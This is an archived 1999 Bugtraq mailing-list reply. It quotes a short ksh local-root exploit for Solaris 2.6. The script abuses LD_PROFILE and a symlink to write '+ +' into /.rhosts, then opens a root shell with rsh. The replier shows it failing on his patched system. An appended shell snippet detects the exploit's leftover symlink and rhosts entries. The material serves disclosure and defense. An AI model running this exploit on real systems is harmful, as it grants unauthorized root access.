Bugtraq mailing list archives

Re: LD_PROFILE local root exploit for solaris 2.6


From: bsides () TOWERY COM (Brock Sides)
Date: Thu, 23 Sep 1999 16:43:51 -0500


On Wed, 22 Sep 1999, Steve Mynott wrote:

> works on solaris 2.6 sparc anyway...
>
> #! /bin/ksh
> #  LD_PROFILE local root exploit for solaris
> #  steve () tightrope demon co uk 19990922
> umask 000
> ln -s /.rhosts /var/tmp/ps.profile
> export LD_PROFILE=/usr/bin/ps
> /usr/bin/ps
> echo + + >  /.rhosts
> rsh -l root localhost csh -i

Not on my system:

[[brock@agfa brock]$ uname -a
SunOS agfa 5.6 Generic_105181-16 sun4m sparc SUNW,SPARCstation-20
[[brock@agfa brock]$ cat r00t.sh
#! /bin/ksh
#  LD_PROFILE local root exploit for solaris
#  steve () tightrope demon co uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + >  /.rhosts
rsh -l root localhost csh -i

[[brock@agfa brock]$ ./r00t.sh
   PID TTY      TIME CMD
 22565 pts/5    0:00 r00t.sh
 22484 pts/5    0:01 bash
./r00t.sh[8]: /.rhosts: cannot create
permission denied
[[brock@agfa brock]$

--
Brock Sides
Unix Systems Administration
Towery Publishing
bsides () towery com
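
An added defensive check, not part of either post: it looks for the two artifacts the quoted script leaves behind, a symlink named `*.profile` in the profile output directory and a wildcard trust line in an rhosts file. The function names are hypothetical, the directory and file are parameters (the script itself uses `/var/tmp` and `/.rhosts`), and `readlink` is assumed to be available.

```shell
#!/bin/sh
# Added example (not from the original thread). Both functions take the
# path to inspect as an argument so they can be run against a test copy.

# Print every symlink named *.profile directly inside directory $1,
# together with its target. A profile output file that is a symlink is
# the precondition the quoted script sets up with "ln -s".
# Returns 0 if at least one symlink was found, 1 otherwise.
find_profile_symlinks() {
    dir=$1
    found=1
    for f in "$dir"/*.profile; do
        # -L is true only for symlinks (dangling ones included); an
        # unmatched glob is left literal and fails this test as well.
        if [ -L "$f" ]; then
            printf 'SYMLINK %s -> %s\n' "$f" "$(readlink "$f")"
            found=0
        fi
    done
    return $found
}

# Print (with line numbers) wildcard trust lines, "+" or "+ +", in the
# rhosts-format file $1. This is the entry the script tries to write.
# Returns 0 if such a line exists, 1 if none or if the file is missing.
find_rhosts_wildcard() {
    file=$1
    [ -f "$file" ] || return 1
    grep -n -E '^[[:space:]]*\+([[:space:]]+\+)?[[:space:]]*$' "$file"
}

# Typical use on a host being reviewed:
#   find_profile_symlinks /var/tmp
#   find_rhosts_wildcard /.rhosts
```
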


